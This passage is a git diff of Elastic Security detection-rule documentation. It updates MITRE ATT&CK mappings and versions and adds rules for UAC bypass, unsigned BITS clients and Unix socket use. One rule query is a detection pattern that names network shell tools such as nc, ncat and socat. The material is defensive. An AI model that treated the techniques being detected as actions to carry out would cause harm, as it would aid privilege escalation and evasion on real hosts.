Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Inter-Process Communication +** ID: T1559 +** Reference URL: https://attack.mitre.org/techniques/T1559/ +* Sub-technique: +** Name: Component Object Model +** ID: T1559.001 +** Reference URL: https://attack.mitre.org/techniques/T1559/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc b/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc index b010674789..8a320919bd 100644 --- a/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc @@ -33,10 +33,11 @@ Identifies attempts to bypass User Account Control (UAC) via DLL side-loading. A * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -80,3 +81,23 @@ file where host.os.type == "windows" and event.type : "change" and process.name ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL Side-Loading +** ID: T1574.002 +** Reference URL: https://attack.mitre.org/techniques/T1574/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-windows-directory-masquerading.asciidoc b/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-windows-directory-masquerading.asciidoc index f0b2f566ea..5ae7d6f8ce 100644 --- a/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-windows-directory-masquerading.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-windows-directory-masquerading.asciidoc @@ -32,11 +32,12 @@ Identifies an attempt to bypass User Account Control (UAC) by masquerading as a * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -128,3 +129,23 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc b/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc index 9474fb17ee..9eeefa5498 100644 --- a/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc @@ -32,10 +32,12 @@ Identifies attempts to bypass User Account Control (UAC) by abusing an elevated * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -78,3 +80,27 @@ process where host.os.type == "windows" and event.type == "start" and process.na ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Inter-Process Communication +** ID: T1559 +** Reference URL: https://attack.mitre.org/techniques/T1559/ +* Sub-technique: +** Name: Component Object Model +** ID: T1559.001 +** Reference URL: https://attack.mitre.org/techniques/T1559/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc b/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc index 2fdac63213..62673e813a 100644 --- a/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc @@ -30,10 +30,12 @@ Identifies User Account Control (UAC) bypass via hijacking DiskCleanup Scheduled * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -77,3 +79,27 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-icmluautil-elevated-com-interface.asciidoc b/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-icmluautil-elevated-com-interface.asciidoc index da200ace1d..e000b5ac4a 100644 --- a/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-icmluautil-elevated-com-interface.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-icmluautil-elevated-com-interface.asciidoc @@ -30,10 +30,12 @@ Identifies User Account Control (UAC) bypass attempts via the ICMLuaUtil Elevate * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -76,3 +78,27 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Inter-Process Communication +** ID: T1559 +** Reference URL: https://attack.mitre.org/techniques/T1559/ +* Sub-technique: +** Name: Component Object Model +** ID: T1559.001 +** Reference URL: https://attack.mitre.org/techniques/T1559/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc b/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc index a13326f6d8..645b66a8bf 100644 --- a/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc @@ -32,11 +32,12 @@ Identifies attempts to bypass User Account Control (UAC) by hijacking the Micros * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -131,3 +132,23 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: MMC +** ID: T1218.014 +** Reference URL: https://attack.mitre.org/techniques/T1218/014/ diff --git a/docs/detections/prebuilt-rules/rule-details/unauthorized-access-to-an-okta-application.asciidoc b/docs/detections/prebuilt-rules/rule-details/unauthorized-access-to-an-okta-application.asciidoc index 5ed7b6e896..cac33af7ed 100644 --- a/docs/detections/prebuilt-rules/rule-details/unauthorized-access-to-an-okta-application.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unauthorized-access-to-an-okta-application.asciidoc @@ -32,7 +32,7 @@ Identifies unauthorized access attempts to Okta applications. * Use Case: Identity and Access Audit * Data Source: Okta -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/unix-socket-connection.asciidoc b/docs/detections/prebuilt-rules/rule-details/unix-socket-connection.asciidoc new file mode 100644 index 0000000000..ece5650e18 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/unix-socket-connection.asciidoc @@ -0,0 +1,65 @@ +[[unix-socket-connection]] +=== Unix Socket Connection + +This rule monitors for inter-process communication via Unix sockets. Adversaries may attempt to communicate with local Unix sockets to enumerate application details, find vulnerabilities/configuration mistakes and potentially escalate privileges or set up malicious communication channels via Unix sockets for inter-process communication to attempt to evade detection. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend +* Rule Type: BBR + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and ( + (process.name in ("nc", "ncat", "netcat", "nc.openbsd") and + process.args == "-U" and process.args : ("/usr/local/*", "/run/*", "/var/run/*")) or + (process.name == "socat" and + process.args == "-" and process.args : ("UNIX-CLIENT:/usr/local/*", "UNIX-CLIENT:/run/*", "UNIX-CLIENT:/var/run/*")) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Inter-Process Communication +** ID: T1559 +** Reference URL: https://attack.mitre.org/techniques/T1559/ diff --git a/docs/detections/prebuilt-rules/rule-details/unsigned-bits-service-client-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/unsigned-bits-service-client-process.asciidoc new file mode 100644 index 0000000000..ba69088f40 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/unsigned-bits-service-client-process.asciidoc @@ -0,0 +1,72 @@ +[[unsigned-bits-service-client-process]] +=== Unsigned BITS Service Client Process + +Identifies an unsigned Windows Background Intelligent Transfer Service (BITS) client process. Attackers may abuse BITS functionality to download or upload data using the BITS service. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://web.archive.org/web/20230531215706/https://blog.menasec.net/2021/05/hunting-for-suspicious-usage-of.html +* https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-2 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +library where dll.name : "Bitsproxy.dll" and process.executable != null and +not process.code_signature.trusted == true + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: BITS Jobs +** ID: T1197 +** Reference URL: https://attack.mitre.org/techniques/T1197/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/unsigned-dll-loaded-by-a-trusted-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/unsigned-dll-loaded-by-a-trusted-process.asciidoc index 1e99558510..99a809c818 100644 --- a/docs/detections/prebuilt-rules/rule-details/unsigned-dll-loaded-by-a-trusted-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unsigned-dll-loaded-by-a-trusted-process.asciidoc @@ -30,7 +30,7 @@ Identifies digitally signed (trusted) processes loading unsigned DLLs. Attackers * Rule Type: BBR * Data Source: Elastic Defend -*Version*: 1 +*Version*: 101 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/unsigned-dll-loaded-by-svchost.asciidoc b/docs/detections/prebuilt-rules/rule-details/unsigned-dll-loaded-by-svchost.asciidoc index ddb92596a1..6985df5791 100644 --- a/docs/detections/prebuilt-rules/rule-details/unsigned-dll-loaded-by-svchost.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unsigned-dll-loaded-by-svchost.asciidoc @@ -27,9 +27,11 @@ Identifies an unsigned library created in the last 5 minutes and subsequently lo * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -151,3 +153,27 @@ library where host.os.type == "windows" and ** Name: Windows Service ** ID: T1543.003 ** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: System Services +** ID: T1569 +** Reference URL: https://attack.mitre.org/techniques/T1569/ +* Sub-technique: +** Name: Service Execution +** ID: T1569.002 +** Reference URL: https://attack.mitre.org/techniques/T1569/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc b/docs/detections/prebuilt-rules/rule-details/unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc index e3c4f2aabf..d9d6cb793e 100644 --- a/docs/detections/prebuilt-rules/rule-details/unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc @@ -29,7 +29,7 @@ Identifies a Windows trusted program running from locations often abused by adve * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -144,6 +144,14 @@ library where host.os.type == "windows" and ** ID: TA0005 ** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Technique: ** Name: Hijack Execution Flow ** ID: T1574 ** Reference URL: https://attack.mitre.org/techniques/T1574/ diff --git a/docs/detections/prebuilt-rules/rule-details/untrusted-driver-loaded.asciidoc b/docs/detections/prebuilt-rules/rule-details/untrusted-driver-loaded.asciidoc index 1853a0b28b..6eaa986b59 100644 --- a/docs/detections/prebuilt-rules/rule-details/untrusted-driver-loaded.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/untrusted-driver-loaded.asciidoc @@ -33,7 +33,7 @@ Identifies attempt to load an untrusted driver. Adversaries may modify code sign * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -126,10 +126,10 @@ driver where host.os.type == "windows" and process.pid == 4 and ** ID: TA0005 ** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: -** Name: Subvert Trust Controls -** ID: T1553 -** Reference URL: https://attack.mitre.org/techniques/T1553/ +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ * Sub-technique: -** Name: Code Signing Policy Modification -** ID: T1553.006 -** Reference URL: https://attack.mitre.org/techniques/T1553/006/ +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-aws-command-for-a-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-aws-command-for-a-user.asciidoc index 3c6110f7f3..c024ec36a1 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-aws-command-for-a-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-aws-command-for-a-user.asciidoc @@ -30,7 +30,7 @@ A machine learning job detected an AWS API command that, while not inherently su * Rule Type: Machine Learning * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-child-process-of-dns-exe.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-child-process-of-dns-exe.asciidoc index f731886310..25c21a24d3 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-child-process-of-dns-exe.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-child-process-of-dns-exe.asciidoc @@ -34,13 +34,13 @@ Identifies an unexpected process spawning from dns.exe, the process responsible * Domain: Endpoint * OS: Windows * Use Case: Threat Detection -* Tactic: Initial Access +* Tactic: Lateral Movement * Resources: Investigation Guide * Data Source: Elastic Endgame * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -104,10 +104,10 @@ process where host.os.type == "windows" and event.type == "start" and process.pa *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Initial Access -** ID: TA0001 -** Reference URL: https://attack.mitre.org/tactics/TA0001/ +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ * Technique: -** Name: External Remote Services -** ID: T1133 -** Reference URL: https://attack.mitre.org/techniques/T1133/ +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-city-for-an-aws-command.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-city-for-an-aws-command.asciidoc index 6371f85129..e0b30db27b 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-city-for-an-aws-command.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-city-for-an-aws-command.asciidoc @@ -30,7 +30,7 @@ A machine learning job detected AWS command activity that, while not inherently * Rule Type: Machine Learning * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-country-for-an-aws-command.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-country-for-an-aws-command.asciidoc index 635bdc2b92..bd103be201 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-country-for-an-aws-command.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-country-for-an-aws-command.asciidoc @@ -30,7 +30,7 @@ A machine learning job detected AWS command activity that, while not inherently * Rule Type: Machine Learning * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-executable-file-creation-by-a-system-critical-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-executable-file-creation-by-a-system-critical-process.asciidoc index 8d66514698..e48113bca3 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-executable-file-creation-by-a-system-critical-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-executable-file-creation-by-a-system-critical-process.asciidoc @@ -30,11 +30,12 @@ Identifies an unexpected executable file being created or modified by a Windows * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -128,3 +129,11 @@ file where host.os.type == "windows" and event.type != "deletion" and ** Name: Exploitation for Defense Evasion ** ID: T1211 ** Reference URL: https://attack.mitre.org/techniques/T1211/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-file-modification-by-dns-exe.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-file-modification-by-dns-exe.asciidoc index 8d32f96bab..3d0ce7456b 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-file-modification-by-dns-exe.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-file-modification-by-dns-exe.asciidoc @@ -33,12 +33,12 @@ Identifies an unexpected file being modified by dns.exe, the process responsible * Domain: Endpoint * OS: Windows * Use Case: Threat Detection -* Tactic: Initial Access +* Tactic: Lateral Movement * Data Source: Elastic Endgame * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -74,10 +74,10 @@ file where host.os.type == "windows" and process.name : "dns.exe" and event.type *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Initial Access -** ID: TA0001 -** Reference URL: https://attack.mitre.org/tactics/TA0001/ +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ * Technique: -** Name: External Remote Services -** ID: T1133 -** Reference URL: https://attack.mitre.org/techniques/T1133/ +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-network-activity-from-a-windows-system-binary.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-network-activity-from-a-windows-system-binary.asciidoc index 045832505b..aaca916e2d 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-network-activity-from-a-windows-system-binary.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-network-activity-from-a-windows-system-binary.asciidoc @@ -32,7 +32,7 @@ Identifies network activity from unexpected system applications. This may indica * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -171,3 +171,19 @@ sequence by process.entity_id with maxspan=5m ** Name: Trusted Developer Utilities Proxy Execution ** ID: T1127 ** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ +* Sub-technique: +** Name: Mshta +** ID: T1218.005 +** Reference URL: https://attack.mitre.org/techniques/T1218/005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-persistence-via-services-registry.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-persistence-via-services-registry.asciidoc index 818568d1f6..f01bc0be92 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-persistence-via-services-registry.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-persistence-via-services-registry.asciidoc @@ -28,10 +28,11 @@ Identifies processes modifying the services registry key directly, instead of th * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -83,3 +84,11 @@ registry where host.os.type == "windows" and ** Name: Windows Service ** ID: T1543.003 ** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-process-extension.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-process-extension.asciidoc index d4adbf1190..39d62ef086 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-process-extension.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-process-extension.asciidoc @@ -30,7 +30,7 @@ Identifies processes running with unusual extensions that are not typically vali * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -76,3 +76,7 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Masquerade File Type +** ID: T1036.008 +** Reference URL: https://attack.mitre.org/techniques/T1036/008/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-process-for-mssql-service-accounts.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-process-for-mssql-service-accounts.asciidoc index 975bbf50c7..76ad1e9859 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-process-for-mssql-service-accounts.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-process-for-mssql-service-accounts.asciidoc @@ -29,11 +29,12 @@ Identifies unusual process executions using MSSQL Service accounts, which can in * Domain: Endpoint * OS: Windows * Use Case: Threat Detection -* Tactic: Initial Access +* Tactic: Lateral Movement +* Tactic: Persistence * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -70,13 +71,13 @@ process where event.type == "start" and host.os.type == "windows" and *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Initial Access -** ID: TA0001 -** Reference URL: https://attack.mitre.org/tactics/TA0001/ +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ * Technique: -** Name: Exploit Public-Facing Application -** ID: T1190 -** Reference URL: https://attack.mitre.org/techniques/T1190/ +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ * Tactic: ** Name: Persistence ** ID: TA0003 @@ -85,3 +86,7 @@ process where event.type == "start" and host.os.type == "windows" and ** Name: Server Software Component ** ID: T1505 ** Reference URL: https://attack.mitre.org/techniques/T1505/ +* Sub-technique: +** Name: SQL Stored Procedures +** ID: T1505.001 +** Reference URL: https://attack.mitre.org/techniques/T1505/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-host.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-host.asciidoc new file mode 100644 index 0000000000..a8297db120 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-host.asciidoc @@ -0,0 +1,61 @@ +[[unusual-process-spawned-by-a-host]] +=== Unusual Process Spawned by a Host + +A machine learning job has detected a suspicious Windows process. This process has been classified as suspicious in two ways. It was predicted to be suspicious by the ProblemChild supervised ML model, and 